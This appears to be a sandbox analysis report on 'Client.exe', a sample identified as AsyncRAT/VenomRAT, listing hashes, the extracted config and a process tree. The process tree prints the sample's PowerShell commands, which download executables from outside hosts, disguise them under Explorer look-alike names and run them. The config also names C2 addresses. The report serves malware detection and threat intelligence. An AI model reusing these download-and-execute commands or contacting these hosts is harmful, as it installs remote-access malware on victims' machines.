Overview

overview

10

Static

static

10

Client.exe

windows7-x64

10

Client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    11-10-2024 21:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client.exe

  • Size

    75KB

  • MD5

    0cc47ff18d0e3298f9beab60d3aa579e

  • SHA1

    67c3020a046707cbde4dea02352272d6e6b77189

  • SHA256

    87dc5fec26bd15e8a2d4d47a3d29b8fe43be265666770bdecfb496c77c0e3212

  • SHA512

    e0f0627aa715665a27e3b505af264c3c2500b9414764d028fa0ecba0dc979a187f75baf4f97b4793b31325dda65310d8a3e3eccfe676b1f7b13e47334b5fe5b3

  • SSDEEP

    1536:fukU0OSeCX/PMRkYKt2OlY6H1bf/i7AkzkiLVclN:fXUHjAPMRkYv4jH1bfVk7BY

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu.exgaming.click

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

51.254.53.24:4449

86.68.222.14:4449
Mutex

ygfmgwcmzefwhl

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • VenomRAT 1 IoCs

    Detects VenomRAT.

    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2564
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:3000
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:2780

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    bffa462d542eb5cfe38495cff249d55d

    SHA1

    977d8262cb189af7e5455804cafcbf0e356fabbd

    SHA256

    7bc7158236d90adeedd0d3b51daf105b64dba4437c33d798fc30320dbb36fbe7

    SHA512

    193a17c26197afe05e2d0812de581456ea6ac1bfdd7de904ec11c0b816b9a251fbfe30b441172189292611f53236c3064685616933432c527165592962b4c648

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    d2d9b6feefd7d7073fb7429b42b3473d

    SHA1

    1cbdf5f6750c86053a78d806c1e92812dd39acba

    SHA256

    48006dec7b45db7defb2869cbb48ad606d2406018e1f5fc9a68ac664f64ae1bb

    SHA512

    deb9e04cbdb7682c2751bb5f8293d8b63a1f4621049582cf19939bffdf9b6d607ccc6f3447b3bc6b74bf738232bddf1a9c66d39b93c18fac4847fe281c15f8b1

    Download Submit

  • \??\PIPE\srvsvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    Download Submit

  • memory/2420-0-0x000007FEF51C3000-0x000007FEF51C4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2420-1-0x0000000001010000-0x0000000001028000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2420-9-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2420-28-0x000007FEF51C3000-0x000007FEF51C4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2420-29-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2564-7-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2564-8-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2768-15-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2768-16-0x0000000000680000-0x0000000000688000-memory.dmp

    Filesize

    32KB

    Download